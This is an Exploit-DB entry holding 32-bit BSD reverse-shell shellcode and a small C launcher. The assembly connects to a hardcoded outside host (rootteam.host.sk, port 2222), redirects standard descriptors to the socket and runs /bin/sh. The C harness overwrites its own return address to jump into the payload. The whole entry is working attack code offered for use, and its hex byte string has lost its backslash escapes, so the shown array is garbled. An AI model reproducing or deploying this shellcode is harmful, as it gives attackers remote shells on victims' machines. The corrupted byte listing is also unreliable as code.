https://www.exploit-db.com/exploits/13254

漏洞细节尚未披露

/*  the back-connect shellcode. The destination addr is
0x28402ec3 (rootteam.host.sk) port is 0x8ae (2222).
size = 93 bytes (little isn't it?)
Greetz 2 sp00fed
	written  by 		dev0id #rus-sec /EFnet (rootteam.host.sk)

BITS	32

jmp short	path
main:
	pop	esi
	xor	eax,eax
	mov byte [esi+1],0x02 	; filling the sock_addr struct
	mov word [esi+2],0x08ae
	mov long [esi+4],0x28402ec3 ;(here your addr: rootteam.host.sk)
	push byte 0x06		;int socket(int domain,int type, int proto) 
	push byte 0x01
	push byte 0x02
	mov	al,97		;/usr/include/sys/syscall.h (socket)
	push	eax
	int	0x80
	mov 	edx,eax		;now in edx we have the descriptor
	push byte 0x10		;making connect
	lea	eax,[esi]
	push	eax
	push	edx		;eax is our socket descriptor
	xor	eax,eax
	mov	al,98		;/usr/include/sys/syscall.h (connect)
	push	eax
	int	0x80
	mov	cl,3
	mov	ebx,-1
loop_1:				;making dup2 3 times
	inc	ebx
	push	ebx
	push	edx
	mov	al,90
	push	eax
	int	0x80
	loopnz	loop_1
	xor	eax,eax
	push    eax
	push long 0x68732f2f
	push long 0x6e69622f
	mov	edx,esp
	push	eax
	push	esp
	push	edx
	mov	al,59		;/usr/include/sys/syscall.h(execve)
	push	eax
	int	0x80 
path:
	call 	main
	db 'A'	
*/
char shellcode[] =
	"xebx56x5ex31xc0xc6x46x01x02x66xc7x46x02xaex08"
	"xc7x46x04xc3x2ex40x28x6ax06x6ax01x6ax02xb0x61"
	"x50xcdx80x89xc2x6ax10x8dx06x50x52x31xc0xb0x62"
	"x50xcdx80xb1x03xbbxffxffxffxffx43x53x52xb0x5a"
	"x50xcdx80xe0xf6x31xc0x50x68x2fx2fx73x68x68x2f"
	"x62x69x6ex89xe2x50x54x52xb0x3bx50xcdx80xe8xa5"
	"xffxffxffx41";
int
main()
{
	int *ret;
	ret=(int*)&ret+2;
	(*ret)=(int)shellcode;
}

// milw0rm.com [2004-09-26]